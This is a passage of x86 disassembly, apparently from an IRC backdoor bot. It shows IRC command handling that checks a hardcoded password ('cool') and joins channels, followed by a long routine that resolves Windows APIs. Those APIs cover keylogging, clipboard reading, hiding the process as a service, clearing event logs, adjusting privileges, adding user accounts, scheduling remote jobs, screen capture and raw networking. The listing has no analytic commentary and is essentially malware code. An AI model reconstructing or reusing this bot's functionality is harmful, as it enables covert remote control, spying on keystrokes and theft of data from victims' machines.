mov [ebp+arg_10], esi
jz loc_401E94
cmp [ebp+var_A4], ebx
jnz loc_401E94
push offset asc_42D124 ; "!"
push [ebp+var_90]
call sub_41C0F4
mov esi, eax
push offset dword_4CB50C
push ebx
inc esi
call sub_41C0F4
push offset asc_429C54 ; "~"
push eax
call sub_41C0F4
push [ebp+arg_10]
mov edi, eax
push offset aCool ; "cool"
call sub_41C070
add esp, 20h
test eax, eax
jz short loc_4098FC
lea eax, [ebp+var_C4]
push edi
push eax
lea eax, [ebp+var_C4]
push eax
push offset aNoticeSPassAut ; "NOTICE %s :Pass auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_409A2D
add esp, 14h
lea eax, [ebp+var_C4]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_409A2D
add esp, 0Ch
push edi
push esi
push offset unk_429BD4
jmp loc_40240A
; ---------------------------------------------------------------------------
loc_4098FC: ; CODE XREF: sub_401ACD+7DEB�j
mov [ebp+arg_24], offset off_429164
loc_409903: ; CODE XREF: sub_401ACD+7E52�j
mov eax, [ebp+arg_24]
push edi
push dword ptr [eax]
call sub_40B450
pop ecx
test eax, eax
pop ecx
jnz short loc_409963
add [ebp+arg_24], 4
cmp [ebp+arg_24], offset off_429168
jb short loc_409903
lea eax, [ebp+var_C4]
push edi
push eax
lea eax, [ebp+var_C4]
push eax
push offset aNoticeSHostAut ; "NOTICE %s :Host Auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_409A2D
add esp, 14h
lea eax, [ebp+var_C4]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_409A2D
add esp, 0Ch
push edi
push esi
push offset unk_429B80
jmp loc_40240A
; ---------------------------------------------------------------------------
loc_409963: ; CODE XREF: sub_401ACD+7E45�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_409968: ; CODE XREF: sub_401ACD+7EC5�j
cmp [ebp+arg_10], ebx
jz loc_401E94
cmp [edi], bl
jnz short loc_409988
push [ebp+arg_10]
push offset aCool ; "cool"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_409999
loc_409988: ; CODE XREF: sub_401ACD+7EA6�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_409968
jmp loc_401E94
; ---------------------------------------------------------------------------
loc_409999: ; CODE XREF: sub_401ACD+7EB9�j
shl esi, 7
add esi, [ebp+arg_18]
lea eax, [ebp+var_E00]
push 7Fh
push eax
push esi
call sub_41B5F0
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_4099D0
push ebx
push [ebp+var_4]
push offset unk_429B60
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 14h
loc_4099D0: ; CODE XREF: sub_401ACD+7EE7�j
lea eax, [ebp+var_C4]
push eax
push offset unk_429B40
jmp loc_402077
; ---------------------------------------------------------------------------
loc_4099E1: ; CODE XREF: sub_401ACD+20E�j
; sub_401ACD+223�j
push [ebp+arg_10]
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4]
call sub_409A2D
add esp, 0Ch
push offset aXI ; "-x+i"
push [ebp+arg_10]
push offset aModeSS_0 ; "MODE %s %s\r\n"
push [ebp+arg_4]
call sub_409A2D
add esp, 10h
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_409A2D
add esp, 10h
mov ds:dword_4CB504, edi
jmp loc_401D6A
sub_401ACD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409A2D proc near ; CODE XREF: sub_401955+3D�p
; sub_401ACD+1CB�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push 200h
push eax
call sub_41C190
add esp, 10h
lea eax, [ebp+var_200]
push 0
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call ds:dword_4CB6A4 ; send
leave
retn
sub_409A2D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409A73 proc near ; CODE XREF: sub_401ACD+518�p
; sub_401ACD+137E�p ...
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice ; "NOTICE"
jnz short loc_409A8E
mov edi, offset aPrivmsg ; "PRIVMSG"
loc_409A8E: ; CODE XREF: sub_409A73+14�j
push edi
call sub_41AFE0
push [ebp+arg_4]
mov esi, 1FAh
sub esi, eax
call sub_41AFE0
pop ecx
sub esi, eax
pop ecx
lea eax, [ebp+var_400]
push [ebp+arg_8]
push offset aS_2 ; "%s"
push esi
push eax
call sub_41B980
add esp, 10h
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push edi
push offset aSSS_0 ; "%s %s :%s\r\n"
push eax
call sub_41B886
add esp, 14h
lea eax, [ebp+var_200]
push 0
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call ds:dword_4CB6A4 ; send
cmp [ebp+arg_10], 0
pop edi
pop esi
jz short locret_409B11
push 7D0h
call dword_427078 ; Sleep
locret_409B11: ; CODE XREF: sub_409A73+91�j
leave
retn
sub_409A73 endp
; =============== S U B R O U T I N E =======================================
sub_409B13 proc near ; CODE XREF: sub_401221+4B�p
push ebx
push ebp
mov ebp, dword_42709C
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ebp ; GetModuleHandleA
mov esi, dword_4270BC
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_409C33
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; GetProcAddress
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov ds:dword_4CB700, eax
call esi ; GetProcAddress
push offset aProcess32first ; "Process32First"
push edi
mov ds:dword_4CB674, eax
call esi ; GetProcAddress
push offset aProcess32next ; "Process32Next"
push edi
mov ds:dword_4CB658, eax
call esi ; GetProcAddress
push offset aModule32first ; "Module32First"
push edi
mov ds:dword_4CB568, eax
call esi ; GetProcAddress
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov ds:dword_4CB514, eax
call esi ; GetProcAddress
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov ds:dword_4CB544, eax
call esi ; GetProcAddress
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov ds:dword_4CB5BC, eax
call esi ; GetProcAddress
push offset aSearchpatha ; "SearchPathA"
push edi
mov ds:dword_4CB6B4, eax
call esi ; GetProcAddress
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov ds:dword_4CB710, eax
call esi ; GetProcAddress
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov ds:dword_4CB574, eax
call esi ; GetProcAddress
cmp ds:dword_4CB700, ebx
mov ds:dword_4CB55C, eax
jz short loc_409C11
cmp ds:dword_4CB674, ebx
jz short loc_409C11
cmp ds:dword_4CB658, ebx
jz short loc_409C11
cmp ds:dword_4CB568, ebx
jz short loc_409C11
cmp ds:dword_4CB544, ebx
jz short loc_409C11
cmp ds:dword_4CB5BC, ebx
jz short loc_409C11
cmp ds:dword_4CB6B4, ebx
jz short loc_409C11
cmp ds:dword_4CB710, ebx
jz short loc_409C11
cmp ds:dword_4CB574, ebx
jz short loc_409C11
cmp eax, ebx
jnz short loc_409C1B
loc_409C11: ; CODE XREF: sub_409B13+B8�j
; sub_409B13+C0�j ...
mov ds:dword_4CB714, 1
loc_409C1B: ; CODE XREF: sub_409B13+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov ds:dword_4CB68C, eax
jz short loc_409C48
push 1
push ebx
call eax
jmp short loc_409C48
; ---------------------------------------------------------------------------
loc_409C33: ; CODE XREF: sub_409B13+1D�j
call dword_42708C ; RtlGetLastWin32Error
mov ds:dword_4CB718, eax
mov ds:dword_4CB714, 1
loc_409C48: ; CODE XREF: sub_409B13+117�j
; sub_409B13+11E�j
push offset aUser32_dll ; "user32.dll"
call dword_4270B8 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_409D5D
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; GetProcAddress
push offset aFindwindowa ; "FindWindowA"
push edi
mov ds:dword_4CB6B0, eax
call esi ; GetProcAddress
push offset aIswindow ; "IsWindow"
push edi
mov ds:dword_4CB660, eax
call esi ; GetProcAddress
push offset aDestroywindow ; "DestroyWindow"
push edi
mov ds:dword_4CB5F4, eax
call esi ; GetProcAddress
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov ds:dword_4CB704, eax
call esi ; GetProcAddress
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov ds:dword_4CB624, eax
call esi ; GetProcAddress
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov ds:dword_4CB644, eax
call esi ; GetProcAddress
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov ds:dword_4CB6A8, eax
call esi ; GetProcAddress
cmp ds:dword_4CB6B0, ebx
mov ds:dword_4CB594, eax
jz short loc_409D01
cmp ds:dword_4CB660, ebx
jz short loc_409D01
cmp ds:dword_4CB5F4, ebx
jz short loc_409D01
cmp ds:dword_4CB704, ebx
jz short loc_409D01
cmp ds:dword_4CB624, ebx
jz short loc_409D01
cmp ds:dword_4CB644, ebx
jz short loc_409D01
cmp ds:dword_4CB6A8, ebx
jz short loc_409D01
cmp eax, ebx
jnz short loc_409D0B
loc_409D01: ; CODE XREF: sub_409B13+1B8�j
; sub_409B13+1C0�j ...
mov ds:dword_4CB71C, 1
loc_409D0B: ; CODE XREF: sub_409B13+1EC�j
push offset aGetasynckeysta ; "GetAsyncKeyState"
push edi
call esi ; GetProcAddress
push offset aGetkeystate ; "GetKeyState"
push edi
mov ds:dword_4CB620, eax
call esi ; GetProcAddress
push offset aGetwindowtexta ; "GetWindowTextA"
push edi
mov ds:dword_4CB528, eax
call esi ; GetProcAddress
push offset aGetforegroundw ; "GetForegroundWindow"
push edi
mov ds:dword_4CB5F0, eax
call esi ; GetProcAddress
cmp ds:dword_4CB620, ebx
mov ds:dword_4CB5D8, eax
jz short loc_409D68
cmp ds:dword_4CB528, ebx
jz short loc_409D68
cmp ds:dword_4CB5F0, ebx
jz short loc_409D68
cmp eax, ebx
jnz short loc_409D72
jmp short loc_409D68
; ---------------------------------------------------------------------------
loc_409D5D: ; CODE XREF: sub_409B13+144�j
call dword_42708C ; RtlGetLastWin32Error
mov ds:dword_4CB720, eax
loc_409D68: ; CODE XREF: sub_409B13+232�j
; sub_409B13+23A�j ...
mov ds:dword_4CB71C, 1
loc_409D72: ; CODE XREF: sub_409B13+246�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_409F2B
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; GetProcAddress
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov ds:dword_4CB6C4, eax
call esi ; GetProcAddress
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov ds:dword_4CB608, eax
call esi ; GetProcAddress
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov ds:dword_4CB678, eax
call esi ; GetProcAddress
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov ds:dword_4CB554, eax
call esi ; GetProcAddress
push offset aRegclosekey ; "RegCloseKey"
push edi
mov ds:dword_4CB5B8, eax
call esi ; GetProcAddress
push offset aOpeneventloga ; "OpenEventLogA"
push edi
mov ds:dword_4CB630, eax
call esi ; GetProcAddress
push offset aCleareventloga ; "ClearEventLogA"
push edi
mov ds:dword_4CB5D4, eax
call esi ; GetProcAddress
cmp ds:dword_4CB6C4, ebx
mov ds:dword_4CB5E4, eax
jz short loc_409E1B
cmp ds:dword_4CB608, ebx
jz short loc_409E1B
cmp ds:dword_4CB678, ebx
jz short loc_409E1B
cmp ds:dword_4CB554, ebx
jz short loc_409E1B
cmp ds:dword_4CB5B8, ebx
jz short loc_409E1B
cmp ds:dword_4CB630, ebx
jnz short loc_409E25
loc_409E1B: ; CODE XREF: sub_409B13+2DE�j
; sub_409B13+2E6�j ...
mov ds:dword_4CB724, 1
loc_409E25: ; CODE XREF: sub_409B13+306�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov ds:dword_4CB638, eax
call esi ; GetProcAddress
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov ds:dword_4CB610, eax
call esi ; GetProcAddress
cmp ds:dword_4CB638, ebx
mov ds:dword_4CB6C0, eax
jz short loc_409E60
cmp ds:dword_4CB610, ebx
jz short loc_409E60
cmp eax, ebx
jnz short loc_409E6A
loc_409E60: ; CODE XREF: sub_409B13+33F�j
; sub_409B13+347�j
mov ds:dword_4CB724, 1
loc_409E6A: ; CODE XREF: sub_409B13+34B�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; GetProcAddress
push offset aOpenservicea ; "OpenServiceA"
push edi
mov ds:dword_4CB648, eax
call esi ; GetProcAddress
push offset aStartservicea ; "StartServiceA"
push edi
mov ds:dword_4CB530, eax
call esi ; GetProcAddress
push offset aControlservice ; "ControlService"
push edi
mov ds:dword_4CB538, eax
call esi ; GetProcAddress
push offset aDeleteservice ; "DeleteService"
push edi
mov ds:dword_4CB59C, eax
call esi ; GetProcAddress
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov ds:dword_4CB5A0, eax
call esi ; GetProcAddress
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov ds:dword_4CB54C, eax
call esi ; GetProcAddress
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov ds:dword_4CB614, eax
call esi ; GetProcAddress
cmp ds:dword_4CB648, ebx
mov ds:dword_4CB53C, eax
jz short loc_409F0E
cmp ds:dword_4CB530, ebx
jz short loc_409F0E
cmp ds:dword_4CB538, ebx
jz short loc_409F0E
cmp ds:dword_4CB59C, ebx
jz short loc_409F0E
cmp ds:dword_4CB5A0, ebx
jz short loc_409F0E
cmp ds:dword_4CB54C, ebx
jz short loc_409F0E
cmp ds:dword_4CB614, ebx
jz short loc_409F0E
cmp eax, ebx
jnz short loc_409F18
loc_409F0E: ; CODE XREF: sub_409B13+3C5�j
; sub_409B13+3CD�j ...
mov ds:dword_4CB724, 1
loc_409F18: ; CODE XREF: sub_409B13+3F9�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov ds:dword_4CB534, eax
jnz short loc_409F40
jmp short loc_409F36
; ---------------------------------------------------------------------------
loc_409F2B: ; CODE XREF: sub_409B13+26A�j
call dword_42708C ; RtlGetLastWin32Error
mov ds:dword_4CB728, eax
loc_409F36: ; CODE XREF: sub_409B13+416�j
mov ds:dword_4CB724, 1
loc_409F40: ; CODE XREF: sub_409B13+414�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_40A00C
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; GetProcAddress
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov ds:dword_4CB640, eax
call esi ; GetProcAddress
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov ds:dword_4CB698, eax
call esi ; GetProcAddress
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov ds:dword_4CB6A0, eax
call esi ; GetProcAddress
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov ds:dword_4CB65C, eax
call esi ; GetProcAddress
push offset aSelectobject ; "SelectObject"
push edi
mov ds:dword_4CB578, eax
call esi ; GetProcAddress
push offset aBitblt ; "BitBlt"
push edi
mov ds:dword_4CB524, eax
call esi ; GetProcAddress
push offset aDeletedc ; "DeleteDC"
push edi
mov ds:dword_4CB69C, eax
call esi ; GetProcAddress
push offset aDeleteobject ; "DeleteObject"
push edi
mov ds:dword_4CB510, eax
call esi ; GetProcAddress
cmp ds:dword_4CB640, ebx
mov ds:dword_4CB5B0, eax
jz short loc_40A017
cmp ds:dword_4CB698, ebx
jz short loc_40A017
cmp ds:dword_4CB6A0, ebx
jz short loc_40A017
cmp ds:dword_4CB65C, ebx
jz short loc_40A017
cmp ds:dword_4CB578, ebx
jz short loc_40A017
cmp ds:dword_4CB524, ebx
jz short loc_40A017
cmp ds:dword_4CB69C, ebx
jz short loc_40A017
cmp ds:dword_4CB510, ebx
jz short loc_40A017
cmp eax, ebx
jnz short loc_40A021
jmp short loc_40A017
; ---------------------------------------------------------------------------
loc_40A00C: ; CODE XREF: sub_409B13+438�j
call dword_42708C ; RtlGetLastWin32Error
mov ds:dword_4CB730, eax
loc_40A017: ; CODE XREF: sub_409B13+4B9�j
; sub_409B13+4C1�j ...
mov ds:dword_4CB72C, 1
loc_40A021: ; CODE XREF: sub_409B13+4F5�j
mov ebp, dword_4270B8
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40A2DD
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; GetProcAddress
push offset aWsasocketa ; "WSASocketA"
push edi
mov ds:dword_4CB5C4, eax
call esi ; GetProcAddress
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov ds:dword_4CB6F8, eax
call esi ; GetProcAddress
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov ds:dword_4CB564, eax
call esi ; GetProcAddress
push offset aWsaioctl ; "WSAIoctl"
push edi
mov ds:dword_4CB540, eax
call esi ; GetProcAddress
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov ds:dword_4CB600, eax
call esi ; GetProcAddress
push offset aWsacleanup ; "WSACleanup"
push edi
mov ds:dword_4CB5E8, eax
call esi ; GetProcAddress
push offset aSocket ; "socket"
push edi
mov ds:dword_4CB5AC, eax
call esi ; GetProcAddress
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov ds:dword_4CB6D4, eax
call esi ; GetProcAddress
push offset aConnect ; "connect"
push edi
mov ds:dword_4CB6F0, eax
call esi ; GetProcAddress
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov ds:dword_4CB5FC, eax
call esi ; GetProcAddress
push offset aInet_addr ; "inet_addr"
push edi
mov ds:dword_4CB6E0, eax
call esi ; GetProcAddress
push offset aHtons ; "htons"
push edi
mov ds:dword_4CB694, eax
call esi ; GetProcAddress
push offset aHtonl ; "htonl"
push edi
mov ds:dword_4CB654, eax
call esi ; GetProcAddress
push offset aNtohs ; "ntohs"
push edi
mov ds:dword_4CB650, eax
call esi ; GetProcAddress
push offset aNtohl ; "ntohl"
push edi
mov ds:dword_4CB584, eax
call esi ; GetProcAddress
push offset aSend ; "send"
push edi
mov ds:dword_4CB57C, eax
call esi ; GetProcAddress
push offset aSendto ; "sendto"
push edi
mov ds:dword_4CB6A4, eax
call esi ; GetProcAddress
push offset aRecv ; "recv"
push edi
mov ds:dword_4CB6B8, eax
call esi ; GetProcAddress
push offset aRecvfrom ; "recvfrom"
push edi
mov ds:dword_4CB66C, eax
call esi ; GetProcAddress
mov ds:dword_4CB62C, eax
push offset aBind ; "bind"
push edi
call esi ; GetProcAddress
push offset aSelect ; "select"
push edi
mov ds:dword_4CB680, eax
call esi ; GetProcAddress
push offset aListen ; "listen"
push edi
mov ds:dword_4CB63C, eax
call esi ; GetProcAddress
push offset aAccept ; "accept"
push edi
mov ds:dword_4CB67C, eax
call esi ; GetProcAddress
push offset aSetsockopt ; "setsockopt"
push edi
mov ds:dword_4CB6E8, eax
call esi ; GetProcAddress
push offset aGetsockname ; "getsockname"
push edi
mov ds:dword_4CB634, eax
call esi ; GetProcAddress
push offset aGethostname ; "gethostname"
push edi
mov ds:dword_4CB5F8, eax
call esi ; GetProcAddress
push offset aGethostbyname ; "gethostbyname"
push edi
mov ds:dword_4CB668, eax
call esi ; GetProcAddress
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov ds:dword_4CB6D8, eax
call esi ; GetProcAddress
push offset aGetpeername ; "getpeername"
push edi
mov ds:dword_4CB60C, eax
call esi ; GetProcAddress
push offset aClosesocket ; "closesocket"
push edi
mov ds:dword_4CB5A8, eax
call esi ; GetProcAddress
cmp ds:dword_4CB5C4, ebx
mov ds:dword_4CB6EC, eax
jz loc_40A2E8
cmp ds:dword_4CB6F8, ebx
jz loc_40A2E8
cmp ds:dword_4CB564, ebx
jz loc_40A2E8
cmp ds:dword_4CB600, ebx
jz loc_40A2E8
cmp ds:dword_4CB5E8, ebx
jz loc_40A2E8
cmp ds:dword_4CB5AC, ebx
jz loc_40A2E8
cmp ds:dword_4CB6D4, ebx
jz loc_40A2E8
cmp ds:dword_4CB6F0, ebx
jz loc_40A2E8
cmp ds:dword_4CB5FC, ebx
jz loc_40A2E8
cmp ds:dword_4CB6E0, ebx
jz loc_40A2E8
cmp ds:dword_4CB694, ebx
jz loc_40A2E8
cmp ds:dword_4CB654, ebx
jz loc_40A2E8
cmp ds:dword_4CB650, ebx
jz loc_40A2E8
cmp ds:dword_4CB584, ebx
jz short loc_40A2E8
cmp ds:dword_4CB6A4, ebx
jz short loc_40A2E8
cmp ds:dword_4CB6B8, ebx
jz short loc_40A2E8
cmp ds:dword_4CB66C, ebx
jz short loc_40A2E8
cmp ds:dword_4CB62C, ebx
jz short loc_40A2E8
cmp ds:dword_4CB680, ebx
jz short loc_40A2E8
cmp ds:dword_4CB63C, ebx
jz short loc_40A2E8
cmp ds:dword_4CB67C, ebx
jz short loc_40A2E8
cmp ds:dword_4CB6E8, ebx
jz short loc_40A2E8
cmp ds:dword_4CB634, ebx
jz short loc_40A2E8
cmp ds:dword_4CB5F8, ebx
jz short loc_40A2E8
cmp ds:dword_4CB668, ebx
jz short loc_40A2E8
cmp ds:dword_4CB6D8, ebx
jz short loc_40A2E8
cmp ds:dword_4CB60C, ebx
jz short loc_40A2E8
cmp eax, ebx
jnz short loc_40A2F2
jmp short loc_40A2E8
; ---------------------------------------------------------------------------
loc_40A2DD: ; CODE XREF: sub_409B13+51F�j
call dword_42708C ; RtlGetLastWin32Error
mov ds:dword_4CB738, eax
loc_40A2E8: ; CODE XREF: sub_409B13+6BE�j
; sub_409B13+6CA�j ...
mov ds:dword_4CB734, 1
loc_40A2F2: ; CODE XREF: sub_409B13+7C6�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40A3F7
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; GetProcAddress
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov ds:dword_4CB590, eax
call esi ; GetProcAddress
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov ds:dword_4CB518, eax
call esi ; GetProcAddress
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov ds:dword_4CB61C, eax
call esi ; GetProcAddress
push offset aInternetconnec ; "InternetConnectA"
push edi
mov ds:dword_4CB5C8, eax
call esi ; GetProcAddress
push offset aInternetopena ; "InternetOpenA"
push edi
mov ds:dword_4CB628, eax
call esi ; GetProcAddress
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov ds:dword_4CB5EC, eax
call esi ; GetProcAddress
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov ds:dword_4CB558, eax
call esi ; GetProcAddress
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov ds:dword_4CB550, eax
call esi ; GetProcAddress
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov ds:dword_4CB560, eax
call esi ; GetProcAddress
cmp ds:dword_4CB590, ebx
mov ecx, ds:dword_4CB5EC
mov ds:dword_4CB688, eax
jz short loc_40A3D3
cmp ds:dword_4CB518, ebx
jz short loc_40A3D3
cmp ds:dword_4CB61C, ebx
jz short loc_40A3D3
cmp ds:dword_4CB5C8, ebx
jz short loc_40A3D3
cmp ds:dword_4CB628, ebx
jz short loc_40A3D3
cmp ecx, ebx
jz short loc_40A3D3
cmp ds:dword_4CB558, ebx
jz short loc_40A3D3
cmp ds:dword_4CB550, ebx
jz short loc_40A3D3
cmp ds:dword_4CB560, ebx
jz short loc_40A3D3
cmp eax, ebx
jnz short loc_40A3DD
loc_40A3D3: ; CODE XREF: sub_409B13+87E�j
; sub_409B13+886�j ...
mov ds:dword_4CB73C, 1
loc_40A3DD: ; CODE XREF: sub_409B13+8BE�j
cmp ecx, ebx
jz short loc_40A412
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; InternetOpenA
cmp eax, ebx
mov ds:dword_4CB604, eax
jnz short loc_40A412
jmp short loc_40A40C
; ---------------------------------------------------------------------------
loc_40A3F7: ; CODE XREF: sub_409B13+7EA�j
call dword_42708C ; RtlGetLastWin32Error
mov ds:dword_4CB740, eax
mov ds:dword_4CB73C, 1
loc_40A40C: ; CODE XREF: sub_409B13+8E2�j
mov ds:dword_4CB604, ebx
loc_40A412: ; CODE XREF: sub_409B13+8CC�j
; sub_409B13+8E0�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A45C
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; GetProcAddress
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov ds:dword_4CB5DC, eax
call esi ; GetProcAddress
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov ds:dword_4CB70C, eax
call esi ; GetProcAddress
cmp ds:dword_4CB5DC, ebx
mov ds:dword_4CB56C, eax
jz short loc_40A467
cmp ds:dword_4CB70C, ebx
jz short loc_40A467
cmp eax, ebx
jnz short loc_40A471
jmp short loc_40A467
; ---------------------------------------------------------------------------
loc_40A45C: ; CODE XREF: sub_409B13+90A�j
call dword_42708C ; RtlGetLastWin32Error
mov ds:dword_4CB748, eax
loc_40A467: ; CODE XREF: sub_409B13+939�j
; sub_409B13+941�j ...
mov ds:dword_4CB744, 1
loc_40A471: ; CODE XREF: sub_409B13+945�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40A578
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; GetProcAddress
push offset aNetsharedel ; "NetShareDel"
push edi
mov ds:dword_4CB548, eax
call esi ; GetProcAddress
push offset aNetshareenum ; "NetShareEnum"
push edi
mov ds:dword_4CB520, eax
call esi ; GetProcAddress
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov ds:dword_4CB598, eax
call esi ; GetProcAddress
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov ds:dword_4CB5CC, eax
call esi ; GetProcAddress
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov ds:dword_4CB6E4, eax
call esi ; GetProcAddress
push offset aNetuseradd ; "NetUserAdd"
push edi
mov ds:dword_4CB580, eax
call esi ; GetProcAddress
push offset aNetuserdel ; "NetUserDel"
push edi
mov ds:dword_4CB52C, eax
call esi ; GetProcAddress
push offset aNetuserenum ; "NetUserEnum"
push edi
mov ds:dword_4CB51C, eax
call esi ; GetProcAddress
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov ds:dword_4CB5B4, eax
call esi ; GetProcAddress
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov ds:dword_4CB6AC, eax
call esi ; GetProcAddress
push offset aNetwkstagetinf ; "NetWkstaGetInfo"
push edi
mov ds:dword_4CB664, eax
call esi ; GetProcAddress
cmp ds:dword_4CB548, ebx
mov ds:dword_4CB588, eax
jz short loc_40A583
cmp ds:dword_4CB520, ebx
jz short loc_40A583
cmp ds:dword_4CB598, ebx
jz short loc_40A583
cmp ds:dword_4CB5CC, ebx
jz short loc_40A583
cmp ds:dword_4CB6E4, ebx
jz short loc_40A583
cmp ds:dword_4CB580, ebx
jz short loc_40A583
cmp ds:dword_4CB52C, ebx
jz short loc_40A583
cmp ds:dword_4CB51C, ebx
jz short loc_40A583
cmp ds:dword_4CB5B4, ebx
jz short loc_40A583
cmp ds:dword_4CB6AC, ebx
jz short loc_40A583
cmp ds:dword_4CB664, ebx
jnz short loc_40A58D
jmp short loc_40A583
; ---------------------------------------------------------------------------
loc_40A578: ; CODE XREF: sub_409B13+969�j
call dword_42708C ; RtlGetLastWin32Error
mov ds:dword_4CB750, eax
loc_40A583: ; CODE XREF: sub_409B13+A11�j
; sub_409B13+A19�j ...
mov ds:dword_4CB74C, 1
loc_40A58D: ; CODE XREF: sub_409B13+A61�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A5C2
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; GetProcAddress
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov ds:dword_4CB570, eax
call esi ; GetProcAddress
cmp ds:dword_4CB570, ebx
mov ds:dword_4CB64C, eax
jz short loc_40A5CD
cmp eax, ebx
jnz short loc_40A5D7
jmp short loc_40A5CD
